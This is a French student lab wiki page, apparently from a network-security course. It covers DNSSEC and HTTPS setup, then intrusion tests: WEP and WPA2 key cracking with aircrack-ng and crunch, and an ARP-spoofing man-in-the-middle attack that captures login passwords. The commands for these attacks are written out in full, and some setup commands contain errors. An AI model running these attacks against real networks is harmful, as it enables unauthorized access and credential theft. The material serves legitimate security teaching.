&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
